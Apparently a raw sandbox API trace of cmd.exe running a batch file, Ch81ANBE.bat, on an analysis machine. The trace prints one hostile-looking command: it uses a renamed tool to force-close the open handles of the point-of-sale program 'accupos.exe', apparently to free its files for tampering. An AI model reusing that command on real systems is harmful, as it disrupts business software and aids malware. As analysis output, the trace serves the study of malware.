(_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0244.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4f1230 [0244.511] FindClose (in: hFindFile=0x4f1230 | out: hFindFile=0x4f1230) returned 1 [0244.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x32e504 | out: lpFindFileData=0x32e504*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x4f1230 [0244.511] FindClose (in: hFindFile=0x4f1230 | out: hFindFile=0x4f1230) returned 1 [0244.512] GetProcessHeap () returned 0x4f0000 [0244.512] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x56) returned 0x4f1230 [0244.512] GetProcessHeap () returned 0x4f0000 [0244.512] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x514af8 | out: hHeap=0x4f0000) returned 1 [0244.514] _tell (_FileHandle=3) returned 78 [0244.514] _close (_FileHandle=3) returned 0 [0244.514] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ee34 | out: _Buffer="\r\n") returned 2 [0244.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.514] GetFileType (hFile=0x7) returned 0x2 [0244.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf4 | out: lpMode=0x32edf4) returned 1 [0244.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.515] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ee20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ee20*=0x2) returned 1 [0244.517] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0244.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.518] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ee30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0244.518] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ee30 | out: _Buffer=">") returned 1 [0244.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.518] GetFileType (hFile=0x7) returned 0x2 [0244.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf8 | out: lpMode=0x32edf8) returned 1 [0244.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.519] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ee24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ee24*=0x26) returned 1 [0244.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.519] GetFileType (hFile=0x7) returned 0x2 [0244.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f07c | out: lpMode=0x32f07c) returned 1 [0244.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.520] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4f0cf0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0a8, lpReserved=0x0 | out: lpBuffer=0x4f0cf0*, lpNumberOfCharsWritten=0x32f0a8*=0x2) returned 1 [0244.520] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f0b4 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0244.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.521] GetFileType (hFile=0x7) returned 0x2 [0244.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.521] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x2d) returned 1 [0244.523] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32f0d4 | out: _Buffer="\r\n") returned 2 [0244.523] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.523] GetFileType (hFile=0x7) returned 0x2 [0244.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.524] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f094 | out: lpMode=0x32f094) returned 1 [0244.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.524] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0c0*=0x2) returned 1 [0244.526] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0244.526] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0244.526] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0244.526] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0244.526] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0244.526] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0244.526] GetConsoleTitleW (in: lpConsoleTitle=0x32ec44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.528] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.528] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.528] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x32ea00, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x32e9f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x32e9f8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0244.528] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e79c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x32e79c, lpFilePart=0x32e798 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x32e798*=0x0) returned 0x26 [0244.529] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0244.529] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32e518 | out: lpFindFileData=0x32e518*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x504440 [0244.529] FindClose (in: hFindFile=0x504440 | out: hFindFile=0x504440) returned 1 [0244.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32e518 | out: lpFindFileData=0x32e518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x504440 [0244.529] FindClose (in: hFindFile=0x504440 | out: hFindFile=0x504440) returned 1 [0244.529] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0244.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32e518 | out: lpFindFileData=0x32e518*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x504440 [0244.529] FindClose (in: hFindFile=0x504440 | out: hFindFile=0x504440) returned 1 [0244.530] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0244.530] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0244.530] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0244.530] GetProcessHeap () returned 0x4f0000 [0244.530] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x505f80 | out: hHeap=0x4f0000) returned 1 [0244.530] GetEnvironmentStringsW () returned 0x504bf8* [0244.530] GetProcessHeap () returned 0x4f0000 [0244.530] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb7e) returned 0x505f80 [0244.530] FreeEnvironmentStringsW (penv=0x504bf8) returned 1 [0244.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.530] GetProcessHeap () returned 0x4f0000 [0244.530] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5043e0 | out: hHeap=0x4f0000) returned 1 [0244.530] GetProcessHeap () returned 0x4f0000 [0244.530] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504380 | out: hHeap=0x4f0000) returned 1 [0244.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0244.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0244.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0244.531] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0244.532] SetConsoleInputExeNameW () returned 0x1 [0244.532] GetConsoleOutputCP () returned 0x1b5 [0244.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0244.532] SetThreadUILanguage (LangId=0x0) returned 0x409 [0244.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x32f07c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0244.533] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0244.533] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.533] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0244.533] GetProcessHeap () returned 0x4f0000 [0244.533] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504310 | out: hHeap=0x4f0000) returned 1 [0244.533] GetProcessHeap () returned 0x4f0000 [0244.533] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5042a0 | out: hHeap=0x4f0000) returned 1 [0244.533] GetProcessHeap () returned 0x4f0000 [0244.533] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504230 | out: hHeap=0x4f0000) returned 1 [0244.533] GetProcessHeap () returned 0x4f0000 [0244.534] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5041c0 | out: hHeap=0x4f0000) returned 1 [0244.534] GetProcessHeap () returned 0x4f0000 [0244.534] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0ce8 | out: hHeap=0x4f0000) returned 1 [0244.534] GetProcessHeap () returned 0x4f0000 [0244.534] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504160 | out: hHeap=0x4f0000) returned 1 [0244.534] GetProcessHeap () returned 0x4f0000 [0244.534] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f1230 | out: hHeap=0x4f0000) returned 1 [0244.534] GetProcessHeap () returned 0x4f0000 [0244.534] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f11b8 | out: hHeap=0x4f0000) returned 1 [0244.534] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.534] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0244.534] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x32f060, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x32f060*=0x94, lpOverlapped=0x0) returned 1 [0244.534] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0244.535] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.535] GetFileType (hFile=0x78) returned 0x1 [0244.535] _get_osfhandle (_FileHandle=3) returned 0x78 [0244.535] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0244.535] GetProcessHeap () returned 0x4f0000 [0244.535] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x514af8 [0244.536] GetProcessHeap () returned 0x4f0000 [0244.536] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x518b10 [0244.538] GetProcessHeap () returned 0x4f0000 [0244.538] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4f0ce8 [0244.538] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"accupos.exe\"") returned 0xd [0244.538] GetProcessHeap () returned 0x4f0000 [0244.538] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f0ce8 | out: hHeap=0x4f0000) returned 1 [0244.538] GetProcessHeap () returned 0x4f0000 [0244.538] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x518b10 | out: hHeap=0x4f0000) returned 1 [0244.538] GetProcessHeap () returned 0x4f0000 [0244.538] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x514af8 | out: hHeap=0x4f0000) returned 1 [0244.738] _tell (_FileHandle=3) returned 226 [0244.738] _close (_FileHandle=3) returned 0 [0244.738] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32ee34 | out: _Buffer="\r\n") returned 2 [0244.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.739] GetFileType (hFile=0x7) returned 0x2 [0244.739] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf4 | out: lpMode=0x32edf4) returned 1 [0244.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.740] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32ee20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32ee20*=0x2) returned 1 [0244.742] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0244.742] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.742] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x32ee30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0244.742] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x32ee30 | out: _Buffer=">") returned 1 [0244.742] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.742] GetFileType (hFile=0x7) returned 0x2 [0244.743] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.743] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32edf8 | out: lpMode=0x32edf8) returned 1 [0244.743] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.743] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32ee24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x32ee24*=0x26) returned 1 [0244.744] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x32f0b4 | out: _Buffer="FOR") returned 3 [0244.744] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.744] GetFileType (hFile=0x7) returned 0x2 [0244.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.744] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.745] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x3) returned 1 [0244.745] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x32f0b4 | out: _Buffer=" /F") returned 3 [0244.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.745] GetFileType (hFile=0x7) returned 0x2 [0244.746] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.746] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.746] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.746] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x3) returned 1 [0244.747] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x32f0b4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0244.747] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.747] GetFileType (hFile=0x7) returned 0x2 [0244.747] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.747] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.747] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.748] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x20) returned 1 [0244.748] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x32f0b4 | out: _Buffer=" %I IN ") returned 7 [0244.748] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.748] GetFileType (hFile=0x7) returned 0x2 [0244.748] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.748] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.749] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x7) returned 1 [0244.751] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x32f0b0 | out: _Buffer="(`tdq963ii.exe -accepteula \"accupos.exe\" -nobanner`) DO ") returned 56 [0244.751] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.751] GetFileType (hFile=0x7) returned 0x2 [0244.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.751] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f070 | out: lpMode=0x32f070) returned 1 [0244.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.752] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x32f09c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f09c*=0x38) returned 1 [0244.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.752] GetFileType (hFile=0x7) returned 0x2 [0244.753] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.753] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f07c | out: lpMode=0x32f07c) returned 1 [0244.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.753] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x32f0a8, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x32f0a8*=0x1) returned 1 [0244.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.754] GetFileType (hFile=0x7) returned 0x2 [0244.754] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f060 | out: lpMode=0x32f060) returned 1 [0244.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.755] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5042a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x32f08c, lpReserved=0x0 | out: lpBuffer=0x5042a0*, lpNumberOfCharsWritten=0x32f08c*=0xc) returned 1 [0244.755] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f098 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0244.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.755] GetFileType (hFile=0x7) returned 0x2 [0244.757] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.757] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f058 | out: lpMode=0x32f058) returned 1 [0244.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.757] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x32f084, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f084*=0x26) returned 1 [0244.760] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x32f0b4 | out: _Buffer=") ") returned 2 [0244.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.760] GetFileType (hFile=0x7) returned 0x2 [0244.760] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.760] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f074 | out: lpMode=0x32f074) returned 1 [0244.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.761] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0a0*=0x2) returned 1 [0244.761] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x32f0d4 | out: _Buffer="\r\n") returned 2 [0244.761] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.761] GetFileType (hFile=0x7) returned 0x2 [0244.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.762] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x32f094 | out: lpMode=0x32f094) returned 1 [0244.763] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.763] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f0c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x32f0c0*=0x2) returned 1 [0244.765] GetProcessHeap () returned 0x4f0000 [0244.765] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x504328 [0244.765] GetProcessHeap () returned 0x4f0000 [0244.765] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xc) returned 0x4f0ce8 [0244.765] GetProcessHeap () returned 0x4f0000 [0244.765] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xc) returned 0x4f0d00 [0244.765] GetProcessHeap () returned 0x4f0000 [0244.765] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4f0d18 [0244.765] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0244.766] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0244.766] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0244.766] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0244.766] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0244.766] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 